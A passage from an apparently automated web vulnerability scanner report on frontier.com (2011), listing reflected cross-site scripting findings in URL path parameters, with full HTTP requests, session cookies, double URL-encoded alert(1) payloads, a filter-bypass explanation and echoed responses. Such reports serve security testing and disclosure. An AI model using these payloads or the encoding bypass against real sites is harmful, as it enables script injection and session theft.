User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=ec39c893-8f48-41a8-9b1f-be5afaba100a

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=77EE7E015EE500AABD3FD55823F0F1DB; Path=/
Cache-Control: no-store
Content-Type: text/javascript;charset=UTF-8
Content-Length: 147
Date: Tue, 06 Sep 2011 12:46:01 GMT

if (typeof __ADXPOSE_EVENT_QUEUES__ !== "undefined") __ADXPOSE_DRAIN_QUEUE__("TVYMYp4lQTRs9JsS_4098672818ccf<script>alert(1)</script>aa7f8549978");

2.24. http://frontier.com/AgentOrdering/CustomAppTabInfo/tabs.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://frontier.com
Path:   /AgentOrdering/CustomAppTabInfo/tabs.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 72d0c%2527%253balert%25281%2529%252f%252f8df9650bb55 was submitted in the REST URL parameter 1. This input was echoed as 72d0c';alert(1)//8df9650bb55 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /AgentOrdering72d0c%2527%253balert%25281%2529%252f%252f8df9650bb55/CustomAppTabInfo/tabs.css HTTP/1.1
Host: frontier.com
Proxy-Connection: keep-alive
Referer: http://frontier.com/winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.21T0x0000000e_0xc7da8508CMWUL; ASP.NET_SessionId=obmtq3qrw5huoh3ltwzo40av

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:51:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43755


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://frontier.com/PageNotFound.aspx?404;http://frontier.com:80/AgentOrdering72d0c';alert(1)//8df9650bb55/CustomAppTabInfo/tabs.css');//]]>
...[SNIP]...

2.25. http://frontier.com/AgentOrdering/CustomAppTabInfo/tabs.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://frontier.com
Path:   /AgentOrdering/CustomAppTabInfo/tabs.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 246a3%2527%253balert%25281%2529%252f%252fe03a978b338 was submitted in the REST URL parameter 2. This input was echoed as 246a3';alert(1)//e03a978b338 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /AgentOrdering/CustomAppTabInfo246a3%2527%253balert%25281%2529%252f%252fe03a978b338/tabs.css HTTP/1.1
Host: frontier.com
Proxy-Connection: keep-alive
Referer: http://frontier.com/winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.21T0x0000000e_0xc7da8508CMWUL; ASP.NET_SessionId=obmtq3qrw5huoh3ltwzo40av

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:51:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43755


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://frontier.com/PageNotFound.aspx?404;http://frontier.com:80/AgentOrdering/CustomAppTabInfo246a3';alert(1)//e03a978b338/tabs.css');//]]>
...[SNIP]...

2.26. http://frontier.com/AgentOrdering/CustomAppTabInfo/tabs.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://frontier.com
Path:   /AgentOrdering/CustomAppTabInfo/tabs.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1ac67%2527%253balert%25281%2529%252f%252f9c77ef6d725 was submitted in the REST URL parameter 3. This input was echoed as 1ac67';alert(1)//9c77ef6d725 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /AgentOrdering/CustomAppTabInfo/tabs.css1ac67%2527%253balert%25281%2529%252f%252f9c77ef6d725 HTTP/1.1
Host: frontier.com
Proxy-Connection: keep-alive
Referer: http://frontier.com/winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.21T0x0000000e_0xc7da8508CMWUL; ASP.NET_SessionId=obmtq3qrw5huoh3ltwzo40av

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:51:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43755


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://frontier.com/PageNotFound.aspx?404;http://frontier.com:80/AgentOrdering/CustomAppTabInfo/tabs.css1ac67';alert(1)//9c77ef6d725');//]]>
...[SNIP]...

2.27. http://frontier.com/AgentOrdering/Login/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://frontier.com
Path:   /AgentOrdering/Login/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload aa607%2527%253balert%25281%2529%252f%252f787cb7d4dcb was submitted in the REST URL parameter 1. This input was echoed as aa607';alert(1)//787cb7d4dcb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /AgentOrderingaa607%2527%253balert%25281%2529%252f%252f787cb7d4dcb/Login/ HTTP/1.1
Host: frontier.com
Proxy-Connection: keep-alive
Referer: http://frontier.com/winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.21T0x0000000e_0xc7da8508CMWUL; ASP.NET_SessionId=obmtq3qrw5huoh3ltwzo40av; CP=null*; s_cc=true; s_sq=cznfrontier%3D%2526pid%253DFrontier.com%252520%25253A%2525202011%252520Commercial%252520Summer%252520Offer%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Ffrontier.com%25252FAgentOrdering%25252FLogin%25252F%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:30:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43627


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://frontier.com/PageNotFound.aspx?404;http://frontier.com:80/AgentOrderingaa607';alert(1)//787cb7d4dcb/Login/');//]]>
...[SNIP]...

2.28. http://frontier.com/AgentOrdering/Login/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://frontier.com
Path:   /AgentOrdering/Login/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 44e10%2527%253balert%25281%2529%252f%252f43ea9213a24 was submitted in the REST URL parameter 2. This input was echoed as 44e10';alert(1)//43ea9213a24 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /AgentOrdering/Login44e10%2527%253balert%25281%2529%252f%252f43ea9213a24/ HTTP/1.1
Host: frontier.com
Proxy-Connection: keep-alive
Referer: http://frontier.com/winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.21T0x0000000e_0xc7da8508CMWUL; ASP.NET_SessionId=obmtq3qrw5huoh3ltwzo40av; CP=null*; s_cc=true; s_sq=cznfrontier%3D%2526pid%253DFrontier.com%252520%25253A%2525202011%252520Commercial%252520Summer%252520Offer%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Ffrontier.com%25252FAgentOrdering%25252FLogin%25252F%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:30:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43627


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://frontier.com/PageNotFound.aspx?404;http://frontier.com:80/AgentOrdering/Login44e10';alert(1)//43ea9213a24/');//]]>
...[SNIP]...

2.29. http://frontier.com/BillPay/Login.aspx [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://frontier.com
Path:   /BillPay/Login.aspx

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c8990'%3b3ad87ec9c52 was submitted in the REST URL parameter 1. This input was echoed as c8990';3ad87ec9c52 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /BillPayc8990'%3b3ad87ec9c52/Login.aspx HTTP/1.1
Host: frontier.com
Proxy-Connection: keep-alive
Referer: http://frontier.com/winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.21T0x0000000e_0xc7da8508CMWUL; ASP.NET_SessionId=obmtq3qrw5huoh3ltwzo40av; CP=null*; s_cc=true; s_sq=%5B%5BB%5D%5D

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:30:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43311


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://frontier.com/PageNotFound.aspx?aspxerrorpath=/BillPayc8990';3ad87ec9c52/Login.aspx');//]]>
...[SNIP]...

2.30. http://frontier.com/BillPay/Login.aspx [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://frontier.com
Path:   /BillPay/Login.aspx

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3f062%2527%253balert%25281%2529%252f%252fa328f8cd333 was submitted in the REST URL parameter 2. This input was echoed as 3f062';alert(1)//a328f8cd333 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /BillPay/Login.aspx3f062%2527%253balert%25281%2529%252f%252fa328f8cd333 HTTP/1.1
Host: frontier.com
Proxy-Connection: keep-alive
Referer: http://frontier.com/winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.21T0x0000000e_0xc7da8508CMWUL; ASP.NET_SessionId=obmtq3qrw5huoh3ltwzo40av; CP=null*; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:30:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43593


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://frontier.com/PageNotFound.aspx?404;http://frontier.com:80/BillPay/Login.aspx3f062';alert(1)//a328f8cd333');//]]>
...[SNIP]...

2.31. http://frontier.com/Controls/SharedWebMethods.aspx/GetCurrentLocale [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://frontier.com
Path:   /Controls/SharedWebMethods.aspx/GetCurrentLocale

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b2a52%2527%253balert%25281%2529%252f%252f6141da654bb was submitted in the REST URL parameter 2. This input was echoed as b2a52';alert(1)//6141da654bb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

POST /Controls/SharedWebMethods.aspxb2a52%2527%253balert%25281%2529%252f%252f6141da654bb/GetCurrentLocale HTTP/1.1
Host: frontier.com
Proxy-Connection: keep-alive
Referer: http://frontier.com/winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110
Content-Length: 12
Origin: http://frontier.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/json; charset=UTF-8
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.21T0x0000000e_0xc7da8508CMWUL; ASP.NET_SessionId=obmtq3qrw5huoh3ltwzo40av; CP=null*; s_cc=true; s_sq=%5B%5BB%5D%5D

{'href': ''}

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:51:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43807


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://frontier.com/PageNotFound.aspx?404;http://frontier.com:80/Controls/SharedWebMethods.aspxb2a52';alert(1)//6141da654bb/GetCurrentLocale');//]]>
...[SNIP]...

2.32. http://frontier.com/Controls/VirtualCode.ashx [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://frontier.com
Path:   /Controls/VirtualCode.ashx

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 56e88'%3b3d6207f3d2f was submitted in the REST URL parameter 1. This input was echoed as 56e88';3d6207f3d2f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Controls56e88'%3b3d6207f3d2f/VirtualCode.ashx?pageid=98&origPath=%2fftr.css%2f HTTP/1.1
Host: frontier.com
Proxy-Connection: keep-alive
Referer: http://frontier.com/winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.21T0x0000000e_0xc7da8508CMWUL; ASP.NET_SessionId=obmtq3qrw5huoh3ltwzo40av

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:51:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43355


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://frontier.com/PageNotFound.aspx?aspxerrorpath=/Controls56e88';3d6207f3d2f/VirtualCode.ashx');//]]>
...[SNIP]...

2.33. http://frontier.com/Controls/VirtualCode.ashx [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://frontier.com
Path:   /Controls/VirtualCode.ashx

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 73438%2527%253balert%25281%2529%252f%252f0fdd979cf43 was submitted in the REST URL parameter 2. This input was echoed as 73438';alert(1)//0fdd979cf43 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /Controls/VirtualCode.ashx73438%2527%253balert%25281%2529%252f%252f0fdd979cf43?pageid=98&origPath=%2fftr.css%2f HTTP/1.1
Host: frontier.com
Proxy-Connection: keep-alive
Referer: http://frontier.com/winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.21T0x0000000e_0xc7da8508CMWUL; ASP.NET_SessionId=obmtq3qrw5huoh3ltwzo40av

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:51:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43927


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://frontier.com/PageNotFound.aspx?404;http://frontier.com:80/Controls/VirtualCode.ashx73438';alert(1)//0fdd979cf43?pageid=98&origPath=/ftr.css/');//]]>
...[SNIP]...

2.34. http://frontier.com/Images/2011promo/bg-grey.jpg [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://frontier.com
Path:   /Images/2011promo/bg-grey.jpg

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7327a%2527%253balert%25281%2529%252f%252f2dd01931fc3 was submitted in the REST URL parameter 1. This input was echoed as 7327a';alert(1)//2dd01931fc3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /Images7327a%2527%253balert%25281%2529%252f%252f2dd01931fc3/2011promo/bg-grey.jpg HTTP/1.1
Host: frontier.com
Proxy-Connection: keep-alive
Referer: http://frontier.com/winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.21T0x0000000e_0xc7da8508CMWUL; ASP.NET_SessionId=obmtq3qrw5huoh3ltwzo40av; CP=null*

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:51:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43683


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://frontier.com/PageNotFound.aspx?404;http://frontier.com:80/Images7327a';alert(1)//2dd01931fc3/2011promo/bg-grey.jpg');//]]>
...[SNIP]...

2.35. http://frontier.com/Images/2011promo/bg-grey.jpg [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://frontier.com
Path:   /Images/2011promo/bg-grey.jpg

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 611ec%2527%253balert%25281%2529%252f%252f635909959d4 was submitted in the REST URL parameter 2. This input was echoed as 611ec';alert(1)//635909959d4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

